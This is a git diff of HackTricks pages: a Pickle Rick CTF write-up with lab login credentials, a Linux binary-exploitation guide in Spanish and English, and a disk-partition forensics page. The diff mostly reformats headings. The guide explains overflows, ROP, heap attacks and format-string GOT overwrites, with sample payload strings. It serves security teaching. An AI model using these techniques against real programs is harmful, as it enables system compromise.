@ -16,18 +16,17 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
|
||||
</details>
|
||||
|
||||
|
||||
# Pickle Rick
|
||||
## Pickle Rick
|
||||
|
||||
![](../../.gitbook/assets/picklerick.gif)
|
||||
|
||||
This machine was categorised as easy and it was pretty easy.
|
||||
|
||||
## Enumeration
|
||||
### Enumeration
|
||||
|
||||
I started **enumerating the machine using my tool** [**Legion**](https://github.com/carlospolop/legion):
|
||||
|
||||
![](<../../.gitbook/assets/image (79) (2).png>)
|
||||
![](<../../.gitbook/assets/image (79) (1).png>)
|
||||
|
||||
In as you can see 2 ports are open: 80 (**HTTP**) and 22 (**SSH**)
|
||||
|
||||
|
@ -51,7 +50,7 @@ Checking the source code of the root page, a username is discovered: `R1ckRul3s`
|
|||
|
||||
Therefore, you can login on the login page using the credentials `R1ckRul3s:Wubbalubbadubdub`
|
||||
|
||||
## User
|
||||
### User
|
||||
|
||||
Using those credentials you will access a portal where you can execute commands:
|
||||
|
||||
|
@ -73,13 +72,12 @@ The **second ingredient** can be found in `/home/rick`
|
|||
|
||||
![](<../../.gitbook/assets/image (240).png>)
|
||||
|
||||
## Root
|
||||
### Root
|
||||
|
||||
The user **www-data can execute anything as sudo**:
|
||||
|
||||
![](<../../.gitbook/assets/image (238).png>)
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||
|
@ -95,5 +93,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
|
||||
# Linux Exploiting (Basic) (SPA)
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -16,10 +16,9 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
|
||||
</details>
|
||||
|
||||
## Linux Exploiting (Basic) (SPA)
|
||||
|
||||
# Linux Exploiting (Basic) (SPA)
|
||||
|
||||
## **ASLR**
|
||||
### **ASLR**
|
||||
|
||||
Aleatorización de direcciones
|
||||
|
||||
|
@ -64,7 +63,7 @@ int i = 5;
|
|||
|
||||
**Sección STACK**: La pila (Argumentos pasados, cadenas de entorno (env), variables locales…)
|
||||
|
||||
## **1.STACK OVERFLOWS**
|
||||
### **1.STACK OVERFLOWS**
|
||||
|
||||
> buffer overflow, buffer overrun, stack overrun, stack smashing
|
||||
|
||||
|
@ -76,15 +75,15 @@ Para obtener la dirección de una función dentro de un programa se puede hacer:
|
|||
objdump -d ./PROGRAMA | grep FUNCION
|
||||
```
|
||||
|
||||
## ROP
|
||||
### ROP
|
||||
|
||||
### Call to sys\_execve
|
||||
#### Call to sys\_execve
|
||||
|
||||
{% content-ref url="rop-syscall-execv.md" %}
|
||||
[rop-syscall-execv.md](rop-syscall-execv.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
## **2.SHELLCODE**
|
||||
### **2.SHELLCODE**
|
||||
|
||||
Ver interrupciones de kernel: cat /usr/include/i386-linux-gnu/asm/unistd\_32.h | grep “\_\_NR\_”
|
||||
|
||||
|
@ -220,7 +219,7 @@ En fvuln se puede introducir un EBP falso que apunte a un sitio donde esté la d
|
|||
**Off-by-One Exploit**\
|
||||
Se permite modificar tan solo el byte menos significativo del EBP. Se puede llevar a cabo un ataque como el anterior pero la memoria que guarda la dirección de la shellcode debe compartir los 3 primeros bytes con el EBP.
|
||||
|
||||
## **4. Métodos return to Libc**
|
||||
### **4. Métodos return to Libc**
|
||||
|
||||
Método útil cuando el stack no es ejecutable o deja un buffer muy pequeño para modificar.
|
||||
|
||||
|
@ -254,14 +253,14 @@ Una técnica interesante con este método es el llamar a **strncpy()** para move
|
|||
|
||||
Otra técnica interesante es el uso de **mprotect()** la cual permite asignar los permisos deseados a cualquier parte de la memoria. Sirve o servía en BDS, MacOS y OpenBSD, pero no en linux(controla que no se puedan otorgar a la vez permisos de escritura y ejecución). Con este ataque se podría volver a configurar la pila como ejecutable.
|
||||
|
||||
#### **Encadenamiento de funciones**
|
||||
**Encadenamiento de funciones**
|
||||
|
||||
Basándonos en la técnica anterior, esta forma de exploit consiste en:\
|
||||
Relleno + \&Función1 + \&pop;ret; + \&arg\_fun1 + \&Función2 + \&pop;ret; + \&arg\_fun2 + …
|
||||
|
||||
De esta forma se pueden encadenar funciones a las que llamar. Además, si se quieren usar funciones con varios argumentos, se pueden poder los argumentos necesarios (ej 4) y poner los 4 argumentos y buscar dirección a un sitio con opcodes: pop, pop, pop, pop, ret —> **objdump -d ejecutable**
|
||||
|
||||
#### **Encadenamiento mediante falseo de frames (encadenamiento de EBPs)**
|
||||
**Encadenamiento mediante falseo de frames (encadenamiento de EBPs)**
|
||||
|
||||
Consiste en aprovechar el poder manipular el EBP para ir encadenando la ejecución de varias funciones a través del EBP y de "leave;ret"
|
||||
|
||||
|
@ -278,9 +277,9 @@ Esta shellcode se puede repetir indefinidamente en las partes de memoria a las q
|
|||
|
||||
(Se encadena la ejecución de funciones mezclando las vulnerabilidades vistas anteriormente de EBP y de ret2lib)
|
||||
|
||||
## **5.Métodos complementarios**
|
||||
### **5.Métodos complementarios**
|
||||
|
||||
#### **Ret2Ret**
|
||||
**Ret2Ret**
|
||||
|
||||
Útil para cuando no se puede meter una dirección del stack en el EIP (se comprueba que el EIP no contenga 0xbf) o cuando no se puede calcular la ubicación de la shellcode. Pero, la función vulnerable acepte un parámetro (la shellcode irá aquí).
|
||||
|
||||
|
@ -296,7 +295,7 @@ Al parecer funciones como **strncpy** una vez completas eliminan de la pila la d
|
|||
|
||||
Si no tenemos control sobre el primer argumento pero sí sobre el segundo o el tercero, podemos sobreescribir EIP con una dirección a pop-ret o pop-pop-ret, según la que necesitemos.
|
||||
|
||||
#### **Técnica de Murat**
|
||||
**Técnica de Murat**
|
||||
|
||||
En linux todos los progamas se mapean comenzando en 0xbfffffff
|
||||
|
||||
|
@ -306,7 +305,7 @@ De esta forma se obtendría de forma sensilla la dirección donde está la varia
|
|||
|
||||
Esto se puede hacer gracias a que la función execle permite crear un entorno que solo tenga las variables de entorno que se deseen
|
||||
|
||||
#### **Jump to ESP: Windows Style**
|
||||
**Jump to ESP: Windows Style**
|
||||
|
||||
Debido a que el ESP está apuntando al comienzo del stack siempre, esta técnica consiste con sustituir el EIP con la dirección a una llamada a **jmp esp** o **call esp**. De esta forma, se guarda la shellcode después de la sobreescritura del EIP ya que después de ejecutar el **ret** el ESP se encontrará apuntando a la dirección siguiente, justo donde se ha guardado la shellcode.
|
||||
|
||||
|
@ -316,7 +315,7 @@ Además, el hecho de poder colocar la shellcode después de la corrupción del E
|
|||
|
||||
De forma muy similar a esto si sabemos que una función devuelve la dirección donde está guardada la shellcode se puede llamar a **call eax** o **jmp eax (ret2eax).**
|
||||
|
||||
#### **ROP (Return Oriented Programming) o borrowed code chunks**
|
||||
**ROP (Return Oriented Programming) o borrowed code chunks**
|
||||
|
||||
Los trozos de código que se invocan se conocen como gadgets.
|
||||
|
||||
|
@ -332,7 +331,7 @@ De esta forma se pueden ejecutar algunas instrucciones que realmente ni si quier
|
|||
|
||||
Este programa también sirve para crear los **payloads**. Le puedes dar la librería de la que quieres sacar los ROPs y él generará un payload en python al cual tu le das la dirección en la que está dicha librería y el payload ya está listo para ser usado como shellcode. Además, como usa llamadas al sistema no ejecuta realmente nada en el stack sino que solo va guardando direcciones de ROPs que se ejecutarán mediante **ret**. Para usar este payload hay que llamar al payload mediante una instrucción **ret**.
|
||||
|
||||
#### **Integer overflows**
|
||||
**Integer overflows**
|
||||
|
||||
Este tipo de overflows se producen cuando una variable no está preparada para soportar un número tan grande como se le pasa, posiblemente por una confusión entre variables con y sin signo, por ejemplo:
|
||||
|
||||
|
@ -367,11 +366,11 @@ Si le pasamos como primer parámetro un número negativo saldrá que len < 256 y
|
|||
|
||||
Este tipo de overflows no busca lograr escribir algo en el proceso del programa, sino superar filtros mal diseñados para explotar otras vulnerabilidades.
|
||||
|
||||
#### **Variables no inicializadas**
|
||||
**Variables no inicializadas**
|
||||
|
||||
No se sabe el valor que puede tomar una variable no inicializada y podría ser interesante observarlo. Puede ser que tome el valor que tomaba una variable de la función anterior y esta sea controlada por el atacante.
|
||||
|
||||
## **Format Strings**
|
||||
### **Format Strings**
|
||||
|
||||
In C **`printf`** is function that can be used to **print** some string. The **first parameter** this function expects is the **raw text with the formatters**. The **following parameters** expected are the **values** to **substitute** the **formatters** from the raw text.
|
||||
|
||||
|
@ -396,7 +395,7 @@ AAAA%.6000d%4\$n —> Write 6004 in the address indicated by the 4º param
|
|||
AAAA.%500\$08x —> Param at offset 500
|
||||
```
|
||||
|
||||
### \*\*GOT (Global Offsets Table) / PLT (\*\*Procedure Linkage Table)
|
||||
#### \*\*GOT (Global Offsets Table) / PLT (\*\*Procedure Linkage Table)
|
||||
|
||||
This is the table that contains the **address** to the **external functions** used by the program.
|
||||
|
||||
|
@ -406,7 +405,7 @@ Get the address to this table with: **`objdump -s -j .got ./exec`**
|
|||
|
||||
Observe how after **loading** the **executable** in GEF you can **see** the **functions** that are in the **GOT**: `gef➤ x/20x 0xDIR_GOT`
|
||||
|
||||
![](<../../.gitbook/assets/image (620) (1) (1).png>)
|
||||
![](<../../.gitbook/assets/image (620) (1) (1) (1) (1) (1) (2).png>)
|
||||
|
||||
Using GEF you can **start** a **debugging** session and execute **`got`** to see the got table:
|
||||
|
||||
|
@ -421,7 +420,7 @@ Then, the **next time** a call is performed to that address the **function** is
|
|||
|
||||
You can see the PLT addresses with **`objdump -j .plt -d ./vuln_binary`**
|
||||
|
||||
### **Exploit Flow**
|
||||
#### **Exploit Flow**
|
||||
|
||||
As explained before the goal is going to be to **overwrite** the **address** of a **function** in the **GOT** table that is going to be called later. Ideally we could set the **address to a shellcode** located in a executable section, but highly probable you won't be able to write a shellcode in a executable section.\
|
||||
So a different option is to **overwrite** a **function** that **receives** its **arguments** from the **user** and **point** it to the **`system`** **function**.
|
||||
|
@ -443,7 +442,7 @@ HOB LOB HOB\_shellcode-8 NºParam\_dir\_HOB LOB\_shell-HOB\_shell NºParam\_dir\
|
|||
|
||||
\`python -c 'print "\x26\x97\x04\x08"+"\x24\x97\x04\x08"+ "%.49143x" + "%4$hn" + "%.15408x" + "%5$hn"'\`
|
||||
|
||||
### **Format String Exploit Template**
|
||||
#### **Format String Exploit Template**
|
||||
|
||||
You an find a **template** to exploit the GOT using format-strings here:
|
||||
|
||||
|
@ -451,7 +450,7 @@ You an find a **template** to exploit the GOT using format-strings here:
|
|||
[format-strings-template.md](format-strings-template.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
### **.fini\_array**
|
||||
#### **.fini\_array**
|
||||
|
||||
Essentially this is a structure with **functions that will be called** before the program finishes. This is interesting if you can call your **shellcode just jumping to an address**, or in cases where you need to go back to main again to **exploit the format string a second time**.
|
||||
|
||||
|
@ -468,14 +467,14 @@ Contents of section .fini_array:
|
|||
|
||||
Note that this **won't** **create** an **eternal loop** because when you get back to main the canary will notice, the end of the stack might be corrupted and the function won't be recalled again. So with this you will be able to **have 1 more execution** of the vuln.
|
||||
|
||||
### **Format Strings to Dump Content**
|
||||
#### **Format Strings to Dump Content**
|
||||
|
||||
A format string can also be abused to **dump content** from the memory of the program.\
|
||||
For example, in the following situation there is a **local variable in the stack pointing to a flag.** If you **find** where in **memory** the **pointer** to the **flag** is, you can make **printf access** that **address** and **print** the **flag**:
|
||||
|
||||
So, flag is in **0xffffcf4c**
|
||||
|
||||
![](<../../.gitbook/assets/image (618) (2).png>)
|
||||
![](<../../.gitbook/assets/image (622).png>)
|
||||
|
||||
And from the leak you can see the **pointer to the flag** is in the **8th** parameter:
|
||||
|
||||
|
@ -487,7 +486,7 @@ So, **accessing** the **8th parameter** you can get the flag:
|
|||
|
||||
Note that following the **previous exploit** and realising that you can **leak content** you can **set pointers** to **`printf`** to the section where the **executable** is **loaded** and **dump** it **entirely**!
|
||||
|
||||
### **DTOR**
|
||||
#### **DTOR**
|
||||
|
||||
{% hint style="danger" %}
|
||||
Nowadays is very **weird to find a binary with a dtor section**.
|
||||
|
@ -504,12 +503,12 @@ rabin -s /exec | grep “__DTOR”
|
|||
|
||||
Usually you will find the **DTOR** section **between** the values `ffffffff` and `00000000`. So if you just see those values, it means that there **isn't any function registered**. So **overwrite** the **`00000000`** with the **address** to the **shellcode** to execute it.
|
||||
|
||||
### **Format Strings to Buffer Overflows**
|
||||
#### **Format Strings to Buffer Overflows**
|
||||
|
||||
Tthe **sprintf moves** a formatted string **to** a **variable.** Therefore, you could abuse the **formatting** of a string to cause a **buffer overflow in the variable** where the content is copied to.\
|
||||
For example, the payload `%.44xAAAA` will **write 44B+"AAAA" in the variable**, which may cause a buffer overflow.
|
||||
|
||||
### **\_\_atexit Structures**
|
||||
#### **\_\_atexit Structures**
|
||||
|
||||
{% hint style="danger" %}
|
||||
Nowadays is very **weird to exploit this**.
|
||||
|
@ -520,7 +519,7 @@ If you can **modify** the **address** of any of these **functions** to point to
|
|||
Currently the **addresses to the functions** to be executed are **hidden** behind several structures and finally the address to which it points are not the addresses of the functions, but are **encrypted with XOR** and displacements with a **random key**. So currently this attack vector is **not very useful at least on x86** and **x64\_86**.\
|
||||
The **encryption function** is **`PTR_MANGLE`**. **Other architectures** such as m68k, mips32, mips64, aarch64, arm, hppa... **do not implement the encryption** function because it **returns the same** as it received as input. So these architectures would be attackable by this vector.
|
||||
|
||||
### **setjmp() & longjmp()**
|
||||
#### **setjmp() & longjmp()**
|
||||
|
||||
{% hint style="danger" %}
|
||||
Nowadays is very **weird to exploit this**.
|
||||
|
@ -533,15 +532,15 @@ What happens is that EIP and ESP are passed by the **`PTR_MANGLE`** function, so
|
|||
They are useful for error recovery or interrupts.\
|
||||
However, from what I have read, the other registers are not protected, **so if there is a `call ebx`, `call esi` or `call edi`** inside the function being called, control can be taken over. Or you could also modify EBP to modify the ESP.
|
||||
|
||||
#### **VTable y VPTR en C++**
|
||||
**VTable y VPTR en C++**
|
||||
|
||||
Each class has a **Vtable** which is an array of **pointers to methods**.
|
||||
|
||||
Each object of a **class** has a **VPtr** which is a **pointer** to the arrayof its class. The VPtr is part of the header of each object, so if an **overwrite** of the **VPtr** is achieved it could be **modified** to **point** to a dummy method so that executing a function would go to the shellcode.
|
||||
|
||||
## **Medidas preventivas y evasiones**
|
||||
### **Medidas preventivas y evasiones**
|
||||
|
||||
#### **ASLR no tan aleatorio**
|
||||
**ASLR no tan aleatorio**
|
||||
|
||||
PaX dive el espacio de direcciones del proceso en 3 grupos:
|
||||
|
||||
|
@ -563,7 +562,7 @@ Las librerías están en una posición con 16bits de aleatoriedad = 65636 posibl
|
|||
|
||||
La única forma de estar seguros de que el ASLR funciona es usando arquitectura de 64bits. Ahí no hay ataques de fuerza bruta.
|
||||
|
||||
#### **StackGuard y StackShield**
|
||||
**StackGuard y StackShield**
|
||||
|
||||
**StackGuard** inserta antes del EIP —> 0x000aff0d(null, \n, EndOfFile(EOF), \r) —> Siguen siendo vulnerables recv(), memcpy(), read(), bcoy() y no protege el EBP
|
||||
|
||||
|
@ -575,7 +574,7 @@ También se puede comprobar la dirección de retorno con un valor límite, así
|
|||
|
||||
Como se puede ver stackshield tampoco protege las variables locales.
|
||||
|
||||
#### **Stack Smash Protector (ProPolice) -fstack-protector**
|
||||
**Stack Smash Protector (ProPolice) -fstack-protector**
|
||||
|
||||
Se pone el canary antes del EBP. Reordena las variables locales para que los buffers estén en las posiciones más altas y así no puedan sobreescribir otras variables.
|
||||
|
||||
|
@ -591,9 +590,9 @@ La función fork() realiza una copia exacta del proceso del padre, por eso mismo
|
|||
|
||||
Si se usa la función execve() después de fork(), se sobreescribe el espacio y el ataque ya no es posible. vfork() permite ejecutar el proceso hijo sin crear un duplicado hasta que el proceso hijo intentase escribir, entonces sí creaba el duplicado.
|
||||
|
||||
#### **Relocation Read-Only (RELRO)**
|
||||
**Relocation Read-Only (RELRO)**
|
||||
|
||||
### Relro
|
||||
#### Relro
|
||||
|
||||
**Relro (Read only Relocation)** affects the memory permissions similar to NX. The difference is whereas with NX it makes the stack executable, RELRO makes **certain things read only** so we **can't write** to them. The most common way I've seen this be an obstacle is preventing us from doing a **`got` table overwrite**, which will be covered later. The `got` table holds addresses for libc functions so that the binary knows what the addresses are and can call them. Let's see what the memory permissions look like for a `got` table entry for a binary with and without relro.
|
||||
|
||||
|
@ -696,7 +695,7 @@ A pesar de esto, en general los programas no están complicados con esas opcione
|
|||
|
||||
**readelf -l /proc/ID\_PROC/exe | grep BIND\_NOW** —> Para saber si usan el BIND NOW
|
||||
|
||||
#### **Fortify Source -D\_FORTIFY\_SOURCE=1 o =2**
|
||||
**Fortify Source -D\_FORTIFY\_SOURCE=1 o =2**
|
||||
|
||||
Trata de identificar las funciones que copian de un sitio a otro de forma insegura y cambiar la función por una función segura.
|
||||
|
||||
|
@ -712,7 +711,7 @@ La segunda no permite que **%n** venga de una sección con permisos de escritura
|
|||
|
||||
Para mostrar el mensaje de error se usa el argv\[0], por lo que si se pone en el la dirección de otro sitio (como una variable global) el mensaje de error mostrará el contenido de dicha variable. Pag 191
|
||||
|
||||
#### **Reemplazo de Libsafe**
|
||||
**Reemplazo de Libsafe**
|
||||
|
||||
Se activa con: LD\_PRELOAD=/lib/libsafe.so.2\
|
||||
o\
|
||||
|
@ -720,7 +719,7 @@ o\
|
|||
|
||||
Se interceptan las llamadas a algunas funciones inseguras por otras seguras. No está estandarizado. (solo para x86, no para compilaxiones con -fomit-frame-pointer, no compilaciones estaticas, no todas las funciones vulnerables se vuelven seguras y LD\_PRELOAD no sirve en binarios con suid).
|
||||
|
||||
#### **ASCII Armored Address Space**
|
||||
**ASCII Armored Address Space**
|
||||
|
||||
Consiste en cargar las librería compartidas de 0x00000000 a 0x00ffffff para que siempre haya un byte 0x00. Sin embargo, esto realmente no detiene a penas ningún ataque, y menos en little endian.
|
||||
|
||||
|
@ -732,20 +731,20 @@ Consiste en realiza un ROP de forma que se llame a la función strcpy@plt (de la
|
|||
|
||||
Para las funciones que usen el EBP como registro para apuntar a los argumentos al modificar el EIP y apuntar a system() se debe haber modificado el EBP también para que apunte a una zona de memoria que tenga 2 bytes cuales quiera y después la dirección a &”/bin/sh”.
|
||||
|
||||
#### **Jaulas con chroot()**
|
||||
**Jaulas con chroot()**
|
||||
|
||||
debootstrap -arch=i386 hardy /home/user —> Instala un sistema básico bajo un subdirectorio específico
|
||||
|
||||
Un admin puede salir de una de estas jaulas haciendo: mkdir foo; chroot foo; cd ..
|
||||
|
||||
#### **Instrumentación de código**
|
||||
**Instrumentación de código**
|
||||
|
||||
Valgrind —> Busca errores\
|
||||
Memcheck\
|
||||
RAD (Return Address Defender)\
|
||||
Insure++
|
||||
|
||||
## **8 Heap Overflows: Exploits básicos**
|
||||
### **8 Heap Overflows: Exploits básicos**
|
||||
|
||||
**Trozo asignado**
|
||||
|
||||
|
@ -864,11 +863,11 @@ En caso de querer volver a usar uno se asignaría sin problemas. En caso de quer
|
|||
|
||||
Un puntero previamente liberado es usado de nuevo sin control.
|
||||
|
||||
## **8 Heap Overflows: Exploits avanzados**
|
||||
### **8 Heap Overflows: Exploits avanzados**
|
||||
|
||||
Las técnicas de Unlink() y FrontLink() fueron eliminadas al modificar la función unlink().
|
||||
|
||||
#### **The house of mind**
|
||||
**The house of mind**
|
||||
|
||||
Solo una llamada a free() es necesaria para provocar la ejecución de código arbitrario. Interesa buscar un segundo trozo que puede ser desbordado por uno anterior y liberado.
|
||||
|
||||
|
@ -1080,16 +1079,15 @@ Consiste en mediante reservas y liberaciones sementar la memoria de forma que qu
|
|||
**objdump -p -/exec**\
|
||||
**Info functions strncmp —>** Info de la función en gdb
|
||||
|
||||
## Interesting courses
|
||||
### Interesting courses
|
||||
|
||||
* [https://guyinatuxedo.github.io/](https://guyinatuxedo.github.io)
|
||||
* [https://github.com/RPISEC/MBE](https://github.com/RPISEC/MBE)
|
||||
|
||||
## **References**
|
||||
### **References**
|
||||
|
||||
* [**https://guyinatuxedo.github.io/7.2-mitigation\_relro/index.html**](https://guyinatuxedo.github.io/7.2-mitigation\_relro/index.html)
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||
|
@ -1105,5 +1103,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
|
@ -36,7 +36,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
|
||||
### External Recon Methodology
|
||||
|
||||
<img src="../.gitbook/assets/image (620) (8).png" alt="" data-size="original">\
|
||||
<img src="../.gitbook/assets/image (620) (2) (7).png" alt="" data-size="original">\
|
||||
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!\\
|
||||
|
||||
{% embed url="https://go.intigriti.com/hacktricks" %}
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
|
||||
# Partitions/File Systems/Carving
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -16,15 +16,14 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
|
||||
</details>
|
||||
|
||||
## Partitions/File Systems/Carving
|
||||
|
||||
# Partitions/File Systems/Carving
|
||||
|
||||
## Partitions
|
||||
### Partitions
|
||||
|
||||
A hard drive or a **SSD disk can contain different partitions** with the goal of separating data physically.\
|
||||
The **minimum** unit of a disk is the **sector** (normally composed by 512B). So, each partition size needs to be multiple of that size.
|
||||
|
||||
### MBR (master Boot Record)
|
||||
#### MBR (master Boot Record)
|
||||
|
||||
It's allocated in the **first sector of the disk after the 446B of the boot code**. This sector is essential to indicate the PC what and from where a partition should be mounted.\
|
||||
It allows up to **4 partitions** (at most **just 1** can be active/**bootable**). However, if you need more partitions you can use **extended partitions**.. The **final byte** of this first sector is the boot record signature **0x55AA**. Only one partition can be marked as active.\
|
||||
|
@ -38,7 +37,7 @@ From the **bytes 440 to the 443** of the MBR you can find the **Windows Disk Sig
|
|||
|
||||
![](<../../../.gitbook/assets/image (493).png>)
|
||||
|
||||
#### Format
|
||||
**Format**
|
||||
|
||||
| Offset | Length | Item |
|
||||
| ----------- | ---------- | ------------------- |
|
||||
|
@ -49,7 +48,7 @@ From the **bytes 440 to the 443** of the MBR you can find the **Windows Disk Sig
|
|||
| 494 (0x1EE) | 16 (0x10) | Fourth Partition |
|
||||
| 510 (0x1FE) | 2 (0x2) | Signature 0x55 0xAA |
|
||||
|
||||
#### Partition Record Format
|
||||
**Partition Record Format**
|
||||
|
||||
| Offset | Length | Item |
|
||||
| --------- | -------- | ------------------------------------------------------ |
|
||||
|
@ -66,7 +65,7 @@ From the **bytes 440 to the 443** of the MBR you can find the **Windows Disk Sig
|
|||
|
||||
In order to mount a MBR in Linux you first need to get the start offset (you can use `fdisk` and the the `p` command)
|
||||
|
||||
![](<../../../.gitbook/assets/image (413) (3) (3) (3) (2) (1) (1) (2).png>)
|
||||
![](<../../../.gitbook/assets/image (413) (3) (3) (3) (2) (1) (1) (1) (1) (1) (3).png>)
|
||||
|
||||
An then use the following code
|
||||
|
||||
|
@ -77,11 +76,11 @@ mount -o ro,loop,offset=<Bytes>
|
|||
mount -o ro,loop,offset=32256,noatime /path/to/image.dd /media/part/
|
||||
```
|
||||
|
||||
#### LBA (Logical block addressing)
|
||||
**LBA (Logical block addressing)**
|
||||
|
||||
**Logical block addressing** (**LBA**) is a common scheme used for **specifying the location of blocks** of data stored on computer storage devices, generally secondary storage systems such as hard disk drives. LBA is a particularly simple linear addressing scheme; **blocks are located by an integer index**, with the first block being LBA 0, the second LBA 1, and so on.
|
||||
|
||||
### GPT (GUID Partition Table)
|
||||
#### GPT (GUID Partition Table)
|
||||
|
||||
It’s called GUID Partition Table because every partition on your drive has a **globally unique identifier**.
|
||||
|
||||
|
@ -93,17 +92,17 @@ On an MBR disk, the partitioning and boot data is stored in one place. If this d
|
|||
|
||||
GPT also stores **cyclic redundancy check (CRC)** values to check that its data is intact. If the data is corrupted, GPT can notice the problem and **attempt to recover the damaged data** from another location on the disk.
|
||||
|
||||
#### Protective MBR (LBA0)
|
||||
**Protective MBR (LBA0)**
|
||||
|
||||
For limited backward compatibility, the space of the legacy MBR is still reserved in the GPT specification, but it is now used in a **way that prevents MBR-based disk utilities from misrecognizing and possibly overwriting GPT disks**. This is referred to as a protective MBR.
|
||||
|
||||
![](<../../../.gitbook/assets/image (491).png>)
|
||||
|
||||
#### Hybrid MBR (LBA 0 + GPT)
|
||||
**Hybrid MBR (LBA 0 + GPT)**
|
||||
|
||||
In operating systems that support **GPT-based boot through BIOS** services rather than EFI, the first sector may also still be used to store the first stage of the **bootloader** code, but **modified** to recognize **GPT** **partitions**. The bootloader in the MBR must not assume a sector size of 512 bytes.
|
||||
|
||||
#### Partition table header (LBA 1)
|
||||
**Partition table header (LBA 1)**
|
||||
|
||||
The partition table header defines the usable blocks on the disk. It also defines the number and size of the partition entries that make up the partition table (offsets 80 and 84 in the table).
|
||||
|
||||
|
@ -125,7 +124,7 @@ The partition table header defines the usable blocks on the disk. It also define
|
|||
| 88 (0x58) | 4 bytes | CRC32 of partition entries array in little endian |
|
||||
| 92 (0x5C) | \* | Reserved; must be zeroes for the rest of the block (420 bytes for a sector size of 512 bytes; but can be more with larger sector sizes) |
|
||||
|
||||
#### Partition entries (LBA 2–33)
|
||||
**Partition entries (LBA 2–33)**
|
||||
|
||||
| GUID partition entry format | | |
|
||||
| --------------------------- | -------- | ----------------------------------------------------------------------------------------------------------------- |
|
||||
|
@ -137,13 +136,13 @@ The partition table header defines the usable blocks on the disk. It also define
|
|||
| 48 (0x30) | 8 bytes | Attribute flags (e.g. bit 60 denotes read-only) |
|
||||
| 56 (0x38) | 72 bytes | Partition name (36 [UTF-16](https://en.wikipedia.org/wiki/UTF-16)LE code units) |
|
||||
|
||||
#### Partitions Types
|
||||
**Partitions Types**
|
||||
|
||||
![](<../../../.gitbook/assets/image (492).png>)
|
||||
|
||||
More partition types in [https://en.wikipedia.org/wiki/GUID\_Partition\_Table](https://en.wikipedia.org/wiki/GUID\_Partition\_Table)
|
||||
|
||||
### Inspecting
|
||||
#### Inspecting
|
||||
|
||||
After mounting the forensics image with [**ArsenalImageMounter**](https://arsenalrecon.com/downloads/), you can inspect the first sector using the Windows tool [**Active Disk Editor**](https://www.disk-editor.org/index.html)**.** In the following image a **MBR** was detected on the **sector 0** and interpreted:
|
||||
|
||||
|
@ -151,9 +150,9 @@ After mounting the forensics image with [**ArsenalImageMounter**](https://arsena
|
|||
|
||||
If it was a **GPT table instead of a MBR** it should appear the signature _EFI PART_ in the **sector 1** (which in the previous image is empty).
|
||||
|
||||
## File-Systems
|
||||
### File-Systems
|
||||
|
||||
### Windows file-systems list
|
||||
#### Windows file-systems list
|
||||
|
||||
* **FAT12/16**: MSDOS, WIN95/98/NT/200
|
||||
* **FAT32**: 95/2000/XP/2003/VISTA/7/8/10
|
||||
|
@ -161,7 +160,7 @@ If it was a **GPT table instead of a MBR** it should appear the signature _EFI P
|
|||
* **NTFS**: XP/2003/2008/2012/VISTA/7/8/10
|
||||
* **ReFS**: 2012/2016
|
||||
|
||||
### FAT
|
||||
#### FAT
|
||||
|
||||
The **FAT (File Allocation Table)** file system is named for its method of organization, the file allocation table, which resides at the beginning of the volume. To protect the volume, **two copies** of the table are kept, in case one becomes damaged. In addition, the file allocation tables and the root folder must be stored in a **fixed location** so that the files needed to start the system can be correctly located.
|
||||
|
||||
|
@ -185,13 +184,13 @@ The **root directory** occupies a **specific position** for both FAT12 and FAT16
|
|||
|
||||
When a file is "deleted" using a FAT file system, the directory entry remains almost **unchanged** except for the **first character of the file name** (modified to 0xE5), preserving most of the "deleted" file's name, along with its time stamp, file length and — most importantly — its physical location on the disk. The list of disk clusters occupied by the file will, however, be erased from the File Allocation Table, marking those sectors available for use by other files created or modified thereafter. In case of FAT32, it is additionally erased field responsible for upper 16 bits of file start cluster value.
|
||||
|
||||
### **NTFS**
|
||||
#### **NTFS**
|
||||
|
||||
{% content-ref url="ntfs.md" %}
|
||||
[ntfs.md](ntfs.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
### EXT
|
||||
#### EXT
|
||||
|
||||
**Ext2** is the most common file-system for **not journaling** partitions (**partitions that don't change much**) like the boot partition. **Ext3/4** are **journaling** and are used usually for the **rest partitions**.
|
||||
|
||||
|
@ -199,7 +198,7 @@ When a file is "deleted" using a FAT file system, the directory entry remains al
|
|||
[ext.md](ext.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
## **Metadata**
|
||||
### **Metadata**
|
||||
|
||||
Some files contains metadata. This is information about the content of the file which sometimes might be interesting for the analyst as depending on the file-type it might have information like:
|
||||
|
||||
|
@ -213,9 +212,9 @@ Some files contains metadata. This is information about the content of the file
|
|||
|
||||
You can use tools like [**exiftool**](https://exiftool.org) and [**Metadiver**](https://www.easymetadata.com/metadiver-2/) to get the metadata of a file.
|
||||
|
||||
## **Deleted Files Recovery**
|
||||
### **Deleted Files Recovery**
|
||||
|
||||
### Logged Deleted Files
|
||||
#### Logged Deleted Files
|
||||
|
||||
